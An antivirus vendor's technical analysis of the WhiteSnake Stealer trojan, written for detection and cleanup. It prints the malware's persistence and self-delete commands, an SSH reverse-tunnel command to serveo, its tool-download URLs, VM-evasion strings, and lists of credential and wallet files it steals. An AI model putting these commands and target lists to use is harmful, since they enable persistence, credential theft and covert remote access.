My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets



Added to the Dr.Web virus database: 2023-10-12

Virus description added:

Packer: .NET Reactor

SHA1 hash:

  • 9b75ef8a67b412122e03a8209c5d46ea5a8cd957 (original file name: «Дополнительные материалы, перечень вопросов, накладные и первичные документы.exe»)


A trojan application also known as WhiteSnake Stealer. It is written in .NET and targets computers running Microsoft Windows operating systems. Malicious actors use it to steal account data from a variety of software and also to hijack other data. In addition, it allows other apps to be downloaded and run in an infected system.

Operating routine

Verification of execution in virtual machines

Before infecting a target system, the trojan checks the runtime environment to detect whether it was launched in a virtual machine. It does this by accessing the WMI interface. For this, the trojan uses the entity Win32_ComputerSystem entity in the \root\CIMV2 namespace. This entity contains information about the computer’s properties and the installed operating system.

In this structure, the fields Model and Manufacturer are verified to see whether the following strings are present in them:

  • virtual
  • vmbox
  • vmware
  • thinapp
  • VMXh
  • innotek gmbh
  • tpvcgateway
  • tpautoconnsvc
  • vbox
  • kvm
  • red hat
  • qemu

The above fields correspond to the following information:

  • Model ― the name assigned to the computer by its manufacturer;
  • Manufacturer ― the name of the computer manufacturer.

If a virtual machine is detected, the trojan stops working.

Anchoring in the system

The trojan copies itself into the %LOCALAPPDATA%/WindowsSecurity/ directory. Next, it executes a command that looks like this:

cmd.exe /C chcp 65001 && ping && schtasks /create /tn "<SAMPLE>" /sc MINUTE /tr "%LOCALAPPDATA%\WindowsSecurity\<SAMPLE.EXE>" /rl HIGHEST /f && DEL /F /S /Q /A "<PATH_SAMPLE.EXE>" && START "" "%LOCALAPPDATA%\WindowsSecurity\<SAMPLE.EXE>

where SAMPLE is the name of the malware’s previously copied executable file.

This command performs a number of actions that include:

  1. Changing the console encoding to 65001 (Unicode).
  2. Verifying the availability of a local host.
  3. Creating a task with the following parameters:
    • tn ― task name;
    • tr ― path to the task;
    • sc ― schedule type ― MINUTE;
    • rl ― launching privileges ― HIGHEST (if the trojan is launched without administrative rights, the LIMITED value is used instead);
    • f ― to create a task and disable warnings if a given task already exists.
  4. Deleting the current file from which the trojan was executed.
  5. Running the trojan from %LOCALAPPDATA%\WindowsSecurity\<SAMPLE.EXE>.


Depending on the configuration, the trojan can spread in the following ways:

  • by infecting local user accounts;
  • by infecting removable storage devices

When infecting local user accounts, the trojan accesses the WMI interface, and in the \root\CIMV2 namespace, uses the entity Win32_UserAccount, which contains information about Windows user accounts. With the help of this structure, the trojan obtains the full list of users in the infected system. Next, the malicious program copies itself into the startup directory of every user.

When infecting removable storage devices, the trojan obtains the list of all the drives in the system. If any of the detected drives is removable, the malware copies itself to its root directory.

Collecting system information

The first network packet that the trojan sends to the C&C server after infecting the OS is a packet containing system information and the results obtained by executing tasks. The tasks that the trojan executes will be described in more detail in the corresponding section of the malware description.

Below is an example of the data sent in this packet.

Parameter name (Key) The contents (Value) Data-collection method
Username The Windows user name From the UserName environment variable; spaces are replaced with the _ symbol.
Compname The name of the infected computer From the COMPUTERNAME environment variable; spaces are replaced with the _ symbol.
OS The operating system version From the OSVERSIONINFO structure.
Tag res1110myformish A constant string that represents the trojan’s build identifier.
IP The IP address of the infected computer From the response received after contact-ing the hxxp://ip-api[.]com/line?fields=query,country service.
Screen size Screen resolution listed in the format <width>x<height> *
CPU Processor name From the \root\CIMV2 namespace ― Win32_Processor entity ― Name field.
GPU Video controller name From the \root\CIMV2 namespace ― Win32_VideoController entity ― Name field.
RAM The amount of RAM, GB. From the \root\CIMV2 namespace ― Win32_ComputerSystem entity ― TotalPhysicalMemory field.
Disk Disk size, GB. From the \root\CIMV2 namespace ― Win32_LogicalDisk entity.
Model The name given to the computer by its manufacturer. From the \root\CIMV2 namespace ― Win32_ComputerSystem entity ― Model field.
Manufacturer The computer manufacturer’s name From the \root\CIMV2 namespace ― Win32_ComputerSystem entity― Manufacturer field.
Beacon Proxy type A constant string; its value is either serveo or tor.
Stub version A constant that represents the trojan’s build version.
ExeeD The path to the current executed file *
Execution timestamp Current time *
Screenshot A screenshot encoded with base64 *
LoadedAssemblies The list of loaded dll libraries for the current process *
RunningProcesses The list of running processes *
InstalledApplications The list of installed applications From the SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall Display-Name registry branch.

*For fields where the data-collection method is not described, data is obtained by calling standard functions and algorithms for the C# language.

This packet is an XML form that looks like the following:

<Report xmlns:xsd="{"} xmlns:xsi="{"}>
   <file filename="" filedata="" filesize="" createdDate="" modifiedDate="" />
   <information key=$key_name value=$value /> 
   <information key=$key_name value=$value /> 


  • $key_name and $value ― corresponding fields from the table;
  • files ― contains information about crypto-wallet files, session files, logs, and passwords.

The packet to be sent is encrypted with an RSA algorithm. The public encryption key is built into the trojan as an XML form and is shown below:

    <Modulus>     qFKhw3Pbm+8iRzI/nVQppO1DlMBuIXV8x/mcTZJKMCT2MwkzUVD77VLFac3GGj5/vkbipjQP/gdeYSBHxr2KMNKgV8xfzlB5Az+dC3Rgy/bvO9DohGFnEx1CG7NJRuVt/gjy8gWeSOarnkEQIewXx/+D+xN4Fd4NWguHvPhUguI19kFpPx8f9U2/iv9CsctWvknAFadSd0uiNCvi2RIZQIcpFiUElxAezaZfL1w8BZ5vY/Hi/dstLEUyKqEoxq2ch+LIqTZoLYxkojfdOOyGoWgwY4NO7n5z5akqm9wFU00J7MhcbjhkfUPE/Yy6LXI8Q74CcIJqMYRRaNuwChLWLQ==

The results from completing tasks are sent both to one of the C&C servers and to a dedicated Telegram chat.

The specifics of transferring data to the C&C server

To select a C&C server IP address, the trojan sends a packet to each address from the available list until the transmission is successful. Below is the list of addresses:


The request is generated as follows:

  • Transmission method: PUT.
  • Route formation: <rand_str>_<username>@<compname>_report.wsr, where:
    • <rand_str> ― a random string with a length of 5 symbols;
    • <username> ― user name;
    • <compname> ― this computer’s name.
  • The transfer is carried out as a file upload.

The specifics of transferring data to a Telegram chat

The following message is formed:

#res1110myformish #Wallets #Beacon
<b>OS:</b> <i><Operating system></i>
<b>Country:</b> <i><Country></i>
<b>Username:</b> <i><Windows user account name></i>
<b>Compname:</b> <i><Computer name></i>
<b>Report size:</b> <Size of the sent XML>Mb

Telegram’s API is used to send the packet. The main URL that contains the API token:


The following request parameters are added to this URL:

  • chat_id=****91**** ― a constant from the malware’s configuration.
  • text=hexlify(data) ― contains the text of the message (described above); the data is converted using the hexlify function.
  • reply_markup= ― contains a json, converted with the hexlify function.
  • parse_mode=HTML.

The data from the json:

  "inline_keyboard": [
        "text": "Download",
        "url": ,
        "text": "Open",


  • <c2_response> ― the C&C server’s response to the sent report;
  • <url> ― the hxxp[:]//127[.]0.0.1:18772/handleOpenWSR?r=<c2_response> address.

Tasks executed when collecting information

The trojan has a built-in XML form with a list of data-collection tasks. This form consists of blocks of tasks that are structured as follows:

<command name="0">


  • name ― the type of task executed;
  • args ― the list of arguments for the task.

Collected data

  1. Collecting data using regular expressions―data is collected in the desired directory, using a regular expression.

    Path to the directory Regular expressions
    %AppData%\Authy Desktop\Local Storage\leveldb *
    %AppData%\dolphin_anty db.json
    %USERPROFILE%\OpenVPN\config *\*.ovpn
    %AppData%\WinAuth *.xml
    %AppData%\obs-studio\basic\profiles *\service.json
    %AppData%\FileZilla sitemanager.xml
    %LocalAppData%\AzireVPN token.txt
    %USERPROFILE%\snowflake-ssh session-store.json
    %ProgramFiles(x86)%\Steam ssfn*
    %Appdata%\Discord\Local Storage\leveldb *.l??
    %AppData%\The Bat! ACCOUNT.???
    %SystemDrive% Account.rec0
    %AppData%\Signal config.json
    %AppData%\Session config.json
    %AppData%\tox *.db
    %AppData%\.purple accounts.xml
    %AppData%\ledger live app.json
    %AppData%\atomic\Local Storage\leveldb *.l??
    %AppData%\WalletWasabi\Client\Wallets *.json
    %AppData%\Binance *.json
    %AppData%\Guarda\Local Storage\leveldb *.l??
    %LocalAppData%\Coinomi\Coinomi\wallets *.wallet
    %AppData%\Bitcoin\wallets *\*wallet*
    %AppData%\Electrum\wallets *
    %AppData%\Electrum-LTC\wallets *
    %AppData%\Zcash *wallet*dat
    %AppData%\Exodus exodus.conf.json
    %AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb .l??
    %AppData%\Jaxx\Local Storage\leveldb .l??
    %UserProfile%\Documents\Monero\wallets *\*
    %AppData%\MyMonero FundsRequests*
    %UserProfile%\Desktop *.txt
    %UserProfile%\Downloads *.txt
    %AppData%\Telegram Desktop\tdata *s;????????????????\*s
  2. Collecting user profiles―all data is copied from the desired directory:

    Path to the directory
    %AppData%\Opera Software\Opera Stable
    %AppData%\Opera Software\Opera GX Stable
  3. Collecting data about crypto wallets. The list of crypto wallets that malicious actors are interested in:

    The name of the crypto wallet The ID of the corresponding browser plugin
    Metamask nkbihfbeogaeaoehlefnkodbefgpgknn
    Ronin fnjhmkhhmkbjkkabndcnnogagogbneec
    BinanceChain fhbohimaelbohpjbbldcngcnapndodjp
    TronLink ibnejdfjmmkpcnlpebklmnkoeoihofec
    Phantom bfnaelmomeimhlpmgjnjophhpkkoljpa
  4. Collecting data from the Windows registry:

    Registry key Collected values
    SOFTWARE\Martin Prikryl\WinSCP 2\Sessions\* HostName
    SOFTWARE\FTPWare\CoreFTP\Sites\* Host
    SOFTWARE\Windscribe\Windscribe2 userId

Keylogger registration

The initial keylogger registration is performed when the trojan starts. Its further interaction with the keylogger is carried out through commands received from the C&C server. Keystroke data is saved to the malware’s memory.

Command execution

Before the trojan begins executing commands, it installs a proxy server. The malware’s configuration has a field that is responsible for the proxy type:

  • serveo ― a proxy using the SSH protocol and a Serveo service;
  • tor ― a proxy using the Tor network.

The information about the type of proxy used is sent to the C&C server in the first packet with the system information and is located in the Beacon field.

A proxy server based on the Tor protocol

The trojan verifies whether the Tor application was previously downloaded. This check is performed depending on the availability of the %LOCALAPPDATA%/9hyfy7lwm1/tor\tor-real.exe file. If the program does not exist, the trojan downloads it from the link hxxps[:]//github[.]com/matinrco/tor/releases/download/v0.4.5.10/

Next, it creates a %LOCALAPPDATA%/9hyfy7lwm1/tor\torrc.txt configuration file for Tor as follows:

SOCKSPort <port> + 1
ControlPort <port> + 2
DataDirectory %LOCALAPPDATA%/9hyfy7lwm1/tor/data
HiddenServiceDir  %LOCALAPPDATA%/9hyfy7lwm1/tor/host
HiddenServicePort 80<port>
HiddenServiceVersion 3

where <port> is the port number on which the Tor application is opened.

Lastly, the trojan launches the app with the command %LOCALAPPDATA%/9hyfy7lwm1/tor\tor-real.exe -f '%LOCALAPPDATA%/9hyfy7lwm1/tor\torrc.txt.

A proxy server based on the SSH protocol and a Serveo service

The trojan verifies whether the OpenSSH instrument was downloaded earlier. This check is performed by referring to the SOFTWARE\OpenSSH Windows registry key. If such a key does not exist, the trojan downloads a ZIP archive containing the program, using the link hxxps[:]//github[.]com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/ and places it into %TEMP%/

Next, it unpacks the archive and launches OpenSSH with the following command:

ssh.exe -o "StrictHostKeyChecking=no" -R 80: serveo[.]net


  • o ― options ― these are the parameters of the launch;
  • R ― address ― this is the Serveo service address.

Commands executed by the trojan

After the proxy server is initialized, the trojan creates httpListner and connects to the created server. Next, it waits for commands to arrive.

Below is the list of commands available to the trojan:

Command name Description

The following response to the C&C server is generated: PONG >> <title> >> <keys> >> 0, where:

  • title is the current process name;
  • keys is the data collected by the keylogger.

Removing the trojan from the infected system:

  • The currently running malware process is stopped;
  • The command cmd /C chcp 65001 && ping && DEL /F /S /Q /A "<PATH_SAMPLE.EXE>" is launched to delete the trojan executable file.
REFRESH The re-collection of system information and user data.
SCREENSHOT A screenshot is taken.
NETDISCOVER A separate thread is created to scan the local network.
DPAPI <data> The trojan decrypts user data that was previously uploaded to the C&C server and can only be decrypted locally on the infected computer. The encrypted data is sent in the argument.
WEBCAM A picture is taken with the web camera.
COMPRESS <file_name> The specified file is placed into a ZIP archive. The name of target file is sent in the argument.
DECOMPRESS <file_name> A file is extracted from a target ZIP archive. The name of the target archive is sent in the argument.
TRANSFER Not implemented.
GET_FILE <file_name> The trojan reads the contents of the target file. The name of the target file is sent in the argument.
LIST_FILES The current directory is listed.
LIST_PROCESSES The trojan creates a list of running processes.
EXPOSE <ip> <port> <http_version>

The trojan launches an SSH session. The arguments are:

  • The IP address to connect to;
  • The port number;
  • The HTTP protocol version (HTTP or HTTPS).

The trojan enrolls a SOCKS5 proxy server in the infected system:

  • it installs the socks5_proxy application that is downloaded from hxxps[:]//github[.]com/wzshiming/socks5/releases/download/v0.4.2/socks5_windows_amd64.exe and saved to %LOCALAPPDATA%/9hyfy7lwm1/proxy.exe;
  • it generates a random port;
  • it launches proxy.exe -a<random_port>;
  • it connects to this port via the SSH protocol.
KEYLOGGER START Launches the keylogger.
KEYLOGGER STOP Stops the keylogger.
KEYLOGGER VIEW Receives data recorded by the keylogger.
LOADEXEC <url> Downloads a file and launches it. The argument is the URL for downloading the target file.
LOADER <url> Downloads a file. The argument is the URL leading to the target file.
cd <path> The current directory is changed. The argument is the path to change the target directory to.

Indicators of compromise

News about the trojan

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android